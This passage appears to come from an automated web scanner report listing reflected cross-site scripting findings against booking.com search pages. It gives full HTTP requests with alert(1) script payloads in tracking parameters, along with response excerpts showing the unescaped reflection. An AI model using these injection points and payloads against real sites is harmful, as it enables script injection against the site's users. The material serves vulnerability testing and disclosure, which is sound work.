eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:24:33 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YXwiHh2%2F7WNDWgwOhJxwg7m3%2FTm%2Bpe85r18OTZ9lRoP8elUE0dmw8%2FadgG6c5SxD4aid1EHwSrafIW%2F%2B8zB3GAbDM2cHpJBfB%2BQWMskbjBCWuRuPQGSO3M9EnC3%2B%2F%2BIN3D8gRqTExPl002pYezY6pREisU7bEYN6ARwTakjbUeuXvOPUq79oSdYdUUc%2BJehsGqrvi%2B2X1f8S3cxGcUbWDagZH3JaA2gAbWBmGQo5RdUPZQ0PNg8q%2Bj0tolqe2zY0o130sRQ%2BgaqEYeqKyqz%2BmBrgR%2BERXMD0WbCbL44Ql%2FFAG0AZ3CCOogrnc64c0FVcMYAqevuH%2BGPP9HBNY%2Bwevrws%2BskbVBt4ZSLT7OJC7JsxbDRO3mQfnLKK2uU%2BsczsPJLx%2BZo1QEu6RZcfzC1CdfCEA109fIT9SSx5WP%2Fv79l1M4bTu6yPAFWFtVTkYxEos6RCfCd1YYvBtskch9dRo%2FZK1Q8LlP1KOJh6phIzwhuR31wBBTe3VlVllcYPyrcrTGDXrAeYhoXoucbNqHFibuAcuLlFy3WUkS8zuqnifgo0OOisJReiPE13DcLeSasidl4v%2FRDhmHICDUBi3DFc4Gu5MtyIxMwNaBkWqd%2BAVZ0YCxm6jtlmfLnT7UrbjaMqKPnFJeMGtDmXVPunAfNb4eUvjC1%2BNPsl1AG6qPsNuZ7Ku83YfG5aEu5qnTLnZCroYbaYeQ%2FbwbfXW0auZOoAM%2FHdKCHEfxgxCcYQYFedpQhzFpV8kNKHSPUXYtX4ARa0rNKrKSnMWkL%2Fl9Dalqe8A%2BhUBl9D4sEixGjmIYYmuqXipBEUm9%2F4xNO9jxtRwSbaaEXOKOMi4Z9udoU2cDUK8P3MrVU7wqSKNBRhANT069HQo4iQtLo5De8bozlUisHqg2MA4m7BNJ0mOmtz7id87cKAXcOIYJZJg%2BTG1BV%2F9GxovquslmsDKtygwe4kNkBQegUOnxpNn8clEYIYEWoqqD%2BEWUVKbXfP7CP1KXkm97URqaFViFHN2Q%2BFNEQMZ0XsRqHz5sjNcvePb7WhXl72uBamNjFz3YW4ILWz2r18%2BOm22boeXD42hs%2FhqXOJroc0cqG%2FPgzLMe%2BLbU6hOfBlo%2BSpE4boef%2FIDpcWu%2BBA%2FCZmnJgu%2FaxJcFG606bu%2BYcXBiLJTrcMIigZwuB3EAwY5%2B6uyx177WgkzViVbKxvuKii9O8jHl%2F8BsWZa4oBuzYs7TSNnwu4anmf6cXVUyy5%2BHZJ8vSaNo8bfyCKnRMijlKOIFkkXneSidfTNaWcckGeleCxQSZ%2FyIMRKRO%2FbAdIRb67UYcXaSZryIbWfM%2BFtYd5PrU03VEUmZNZKKHodg3YYitUMh8QTo5bCgUP6F0nozml4XkQkygjqo5ZuAKKeHwXMAnY3qIJ8IP0lWnQFbd0JqkNRXY8Et5fnW%2BZMVn50h4DZVqRelk%2B0xjopl17bATunSMO6qLC%2B4oLC7nAuxrXJA%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:24:33 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 391712
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country
...[SNIP]...
_experiment_event_tracking = true;


booking.env.b_room_groups = [];


booking.env.b_site_experiment_short_url = 1;
booking.env.b_canonical_url = 'http://www.booking.com/searchresults.en.html?29030';alert(1)//3ae62dd2bf5=1;city=20061717;utm_campaign=us;utm_medium=SPPC;utm_source=igougo;utm_term=ufi-P20061717';
booking.env.b_canonical_url_delimiter = ';';
booking.env.b_query_params_delimiter = ';';


booking.env.see_a
...[SNIP]...

4.227. http://www.booking.com/searchresults.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b52e"><script>alert(1)</script>8dbb8f60cc8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717&3b52e"><script>alert(1)</script>8dbb8f60cc8=1 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:24:21 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YXwiHh2%2F7WNDPZ3nY%2BK7rx45hTbiDc3NR6rjIsVt6f1jlSbwDWC0F5qg3fYIcn7xfVbwiCUl6bN%2Fm%2BbW6DM1iG9T9l75VgRlOysflS0PEchLGxSispJgP2km00tzbM%2FnIVzjuo%2B0%2BPa0EJvmEbracpGzLsPNXIOJRG%2FnOr5E6cYIuN%2FI468B1aBIrgFjh1wMbzrGtbVJFAVgv3MlVNvwkXluh91iXhxy2xDHMX6wAy3OnBjtl4Ah%2B0CswDLmYVqq02eNsDeoy23%2B5y7PkAAxBUQVJ2ngOXH%2BQXQfz2E%2BFFAlNRzkKYVKjNKW7gKOZaKjaePZ9fYcvP7i5nimNWdKWUVW0wHlvFRdTE%2Bvj4fFwn0Olx%2FLscop2vWHV5HnzDRsxAxeqPFWU%2FCmWTnBSon1bOxSMzr%2FRSIr6LnmZdmU%2FyM3GPwzkXsfYu%2BlVXhcCmMOby48ZMlG1Aw0nop%2FGlAJtMXbj9UsamMrrkGHm%2BIyhxcZBUkTYBRvoljFbvpV7YmWVeiDi0vRtlqefzxycCgH9gtnl653x1p%2Fp4cBqhE7vtdsJzvVfUYvYb92C4y4Me%2F9LvhlhGm1XnpN80n2LgmCG1fU1r1oLXDt0XPB3LfXaUYiTe1e7%2F0Fq7Eu5AWi1VLOOxeevH%2F74y1NPEy%2B0CcDAHiuJDITmgvJhdefc%2BIPc0G5wS%2B6ayhNXtmaxstyo6YRU3xNHXx%2B0%2B6O%2BMw0nyifAl7BVcJC7HlxDEUodRuCIXOCDrVwM98VWF9CwdhO5psAIV6RH9gvreeC3Adry6BkAfnTTf6lqsLntLO%2BJXCJqGdAMRlIw474fpGFV7C%2BcP1OKB4wIO%2FRqmGaGxSc1p9EnaN%2Ff0D5FSB7AThfnHM8XxK%2Bp1RAW9ldqa05YjorHkRWB6AhADQ0F4uXa%2BELTcyY6lvrTzUKln7%2BGprH6TYK8rMaMv2i5%2BA57Uf%2FIgAsT8naDmG7rPuFPeeWe%2B%2BwigQnVgTvXOJsLmUfwhyWxJrYBF6U5ASVWcDx8J0ogQklkaeVelLx37yshdIzYT0Mz7wWXApJM8n2l6xWIwePH%2FtZbsqX7oi5U0rjNfgg%2F8C6ehwUrDSgWf8PdeFNrAKegJCFeUyxH11tH120eIrfyFXyT%2B2qU8OJqxDPhI9iezUSKzvuXp3e9%2F5pIbWz24KOEX1weARv1H0crDYKo9qW%2FtsYlaXXggn3QDYvyvpHiYP51cr4DIgtCEuhAcUf%2FnnX1MIURYBo3KBXh2IZ1gWOLXh7YgKT3VTi6Fau%2FxukKvQxconvRuxtQaw4DITNrcSjbcVk9SzVt7ZTNWLH1i%2FFVrgZNDt8umkvDgGLVAyzq%2BPX0L0VZo%2Bg8%2FT4qC3A0oI8PasROAAdMF%2F%2Bi3%2B2QxF1IRvE7J%2FXFQfIlJdUZWHWr0LRV5SpqYpQv117OA3HTZJgZpRCCVuuaEd%2BgYhC6fbGETSM73Od5i1iCGtyC2Gq3GzPwwi8kw%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:24:21 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 391772
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country
...[SNIP]...
<link rel="canonical" href="http://www.booking.com/searchresults.en.html?3b52e"><script>alert(1)</script>8dbb8f60cc8=1;city=20061717;utm_campaign=us;utm_medium=SPPC;utm_source=igougo;utm_term=ufi-P20061717" />
...[SNIP]...

4.228. http://www.booking.com/searchresults.html [utm_campaign parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The value of the utm_campaign request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc213'-alert(1)-'d336623f81e was submitted in the utm_campaign parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=usbc213'-alert(1)-'d336623f81e&utm_term=ufi-P20061717 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:23:57 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YdN864bAdMj5susnz%2B%2FDu3gSLqTPdzNwjL1I31V18mXsyk%2B69o4hArL0OKvHY7Kvxwj%2FcgZmigWctGJ1I8DxF0klYwekrb3FoC7l6bC4F%2FwZdZsa5kL5Nmh1XfHCNJ5oo%2FXtK9R7YiCsOSh%2BjqEdDL6TMqC5TeCrXWE6v%2BrSM8rD3gdUVAEpLtgc3gen6DZBzHBoPAoLjnC4WBKp6OBP7Q3tiiqYk9NDtsGWxemU47Z%2BMoxA8POHqotE71C5A4vF48j24O%2FCZlcrPZEbc87ZpzAz0QKGCwgQKgpKHO1k9Aj2lYuw2O1TdoIxkB%2Bo4eWFfmvwvMPjrKl06Iy2ZcPitxBzMDzgZ1%2F8IcYlc%2B%2FkZfWatmGVFlDCKuHTiqfaNUtGx2m2xYUCzy7wrvTz6JkE7HR6W3ZBRm2ZpfI5rJF28c5wcjjejf%2Fv3Jv9OpNobBE%2BbviS3yOnLz5MH%2FOkk24CHnh9JuZK1NBR%2BX8wP4MNI0Ov7OxqbjBnZRCpDReLBXz1Km2ZJpYnlHi8MnngZS0P%2FILX3fr3Ye66Oqe%2BNmRWlFaZw7%2BCYmd0YHWaX5d6NBSdkanZ1A7bIf1dB5Cn72aU1lL6BlqjL0gmYTEqeVwP8R3UKPU9j5Zu4pDJzEc8BtyHRb1s8mahDBNPVU5aPn3MDKvq%2FzQVmDFIBt3G7PZoFREA6013wbEBTKOODkPU7tYLoCnQz7tKg0VLErVZR7rgUWSv83%2BNCbzMAjWOv1McpFlGqs10hRuY2oqOL4hg%2B%2FkFkUZWxeAXcDyO7niEAhh5cDk%2B7FtJiruZk7UjlIIOkmi7AtdSYPtiVfmWy2XyRaEePDaNYvLdgYAMKWDqcw%2F4Cq8CKkx6Nq%2Bcyj03kgRWK%2BLRJ6qVWF4DG0UP8zx6uka2E3%2ByBBMTfLnNzdJrjWT7nd8mgsORG5rcYhwQS31vxq30nM1DZ8gpEanOzcFFE7b9W6p40WLfwDQxU4%2F%2FJ3biLhupzFVKBd6BSguynGz2KqSK7GWxbzqNNREF%2B0NCsdiUO4D2vm9HIR8HivsRIk9xfWdAe0XCEYwA1AEmDwyhIOW9tIbDcBmmXDIzquoHdyzYVhdrM7rRurpn%2B3NsvEaDq2Gor%2FL%2Bff%2BZPJLY%2BPpYU9vglbi%2BnuGkD%2F1r080ujwTUBnjl2KozFRR0hFeROgz9isiSrAPndMU2NRoDtp76u0Og8DWfGylv1YhVp2QB%2BnhrdEtchfJMtCXbdLZRJ470FxtyCTQNtUMh2RRrhlahpIGtIFZYU8FEHcKA12q6bK6f6PKT4x12g1LcD5unUaC92tuIYarrp6o%2BMCzkadCmzF%2BxchVjKX%2Bg37X46gRVzRNUIBznsyd78J2pRNcjWN0fgNpMnIu4QWxtDzKbyswZaQvIm6d%2BOpHj%2FAH7XS1Gmp6u0bw%2Fy7TJDVSlcMeherAaIhyNqqguHm6JNsKHIbXGD%2FB%2FtQWqidx5W2pN72zdnhw5sA%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:23:58 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 391700
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country
...[SNIP]...
true;


booking.env.b_room_groups = [];


booking.env.b_site_experiment_short_url = 1;
booking.env.b_canonical_url = 'http://www.booking.com/searchresults.en.html?city=20061717;utm_campaign=usbc213'-alert(1)-'d336623f81e;utm_medium=SPPC;utm_source=igougo;utm_term=ufi-P20061717';
booking.env.b_canonical_url_delimiter = ';';
booking.env.b_query_params_delimiter = ';';


booking.env.see_all_xxxx_rooms = 'XXXX more room
...[SNIP]...

4.229. http://www.booking.com/searchresults.html [utm_campaign parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The value of the utm_campaign request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb8cc"><script>alert(1)</script>57787d45fe3 was submitted in the utm_campaign parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=useb8cc"><script>alert(1)</script>57787d45fe3&utm_term=ufi-P20061717 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:23:45 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YXwiHh2%2F7WNDPZ3nY%2BK7rx45hTbiDc3NR5vMROsGtdOqni7xd6cAoVKhb9Ewrb6Lle4B6NIh%2BeUKE%2FggOQrYAARfRfTk%2FntY6BuH3F23N88F0MYpNE8DZESnvUMJzvMPYTJJbCGaTCXvK7PgYDOCCkYbMqNK0aFTOvRdjyPlnbUt3yBl%2FKeELAGkfwuNs7wtO5FrbpZdC%2BGuh5pJ%2FXnHhl0s8smu70gfITKTEqQnLkdNP2swIQiLwsn5HW7AgBBPW8meEkgiIgqYtkKjPKWOumbneCFfhRBRM3Zan%2FbDJiNWwjaBHZ7Vojg2ki1eQcLuVnpuYnsleDaQ0%2BtAMyfw7uFhZFFvaT24D4vKfiXoWtng2CubCJkQG2T5lUJblD7UeJq0soh%2BmDVsBpX1JOzeQFoeMa9r2mRnPm9g5XkV%2F96eblnu4CogCLXEDNtTwIPA73sjBYzRwnyWIyxWgTvtisuVxRUHssC%2F81zGOR59ECx6tZ7Wu2yaLjE7r1FQDcu4qyuEUVM7SQpwEnTbF7EMOBabe4X0XoyIs8%2FWg6D5WeHtTcYQF6VrJosKum3C%2FhVbd9sF16fnM%2FfDA5kEXwVlkiEk3UPrVzp6geugHCpksA8oRAalaWVEBWmEifvZ3DuBqCHJWNKW8tncuUnpbhe8GGZtQlC0nO0LAZKCStnSJ9fD%2FQoMqPZfQGHUvnE9aEur3yX%2BZr%2F62z%2Bw6lyy6AyDpxA8XA%2BWPkbFWjcmy5HpPkrKF%2BJxwyv0WoPmHhTXoPBXwDq%2BzG3gxZX7nA%2FeILCZORwYeHt7T%2F%2F4DPUKSB96zivdChbc9Lad2hcal2mu6hlKBcXiFFUGqSsYRpmiG%2FsGTnS%2BFS4FqmZtu2fFh%2BEFuUKypicKdWNZPQcp%2F%2BPtyQh5otLuimAnQcKO6zKsyN18aC%2Fq5sifX8dglWmSI%2B3WXEOa6Uf1exetE2hrPjqT0QwLMnF%2Bnro8G5b1oQrdBHYz4ct2%2B1Tsz8Ioqj75rDT%2BA59dp24qxQ9JIxvW9RkGAJOXo8mbg2s2bXGsmy23ujsoZYwkkU6ArufHV0Dda7pr%2FNXWYOSgKkMt0EFTjHJiwHPM9k5cToEaT4Q9CxaDc3H3ErqDEi7XIxKQ%2FNAzcq7mZGRO4K3pfjJnJdgDnNcSzhCDaaZcIn%2BVIjggqyzrjOdR3oJtZv9zISJIeKxkOfGPMKaohuyUn1dU%2FrSxG1ingSm5XWFugDbEb7OLDcXYVwhxKIKBCfI2xBdx6H5eLVKxu9xBuZQDpA7Cs%2FlMo%2FQPGz6op%2F4gkKarg1JqbsBUPlA%2F%2BUIEDuYRF1rdLHukwKJi9jx32xOHl0PzUaXLtQ9dfnzjtqOEoi%2BtFyZTCmKV%2BypmV22aE17phqZ74dYrnGpLeuoSdcE2d4wODafuhFLr4C5ZiPAqkevvxXjnz2%2FZeqpsZeNU9zsqdwn07LxMu2KMATmsYb0rL3tu%2FCo3AUWf%2BEWU8A%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:23:46 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 391937
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country
...[SNIP]...
<link rel="canonical" href="http://www.booking.com/searchresults.en.html?city=20061717;utm_campaign=useb8cc"><script>alert(1)</script>57787d45fe3;utm_medium=SPPC;utm_source=igougo;utm_term=ufi-P20061717" />
...[SNIP]...

4.230. http://www.booking.com/searchresults.html [utm_medium parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The value of the utm_medium request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 32e1c'-alert(1)-'2f7b3175511 was submitted in the utm_medium parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC32e1c'-alert(1)-'2f7b3175511&utm_campaign=us&utm_term=ufi-P20061717 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
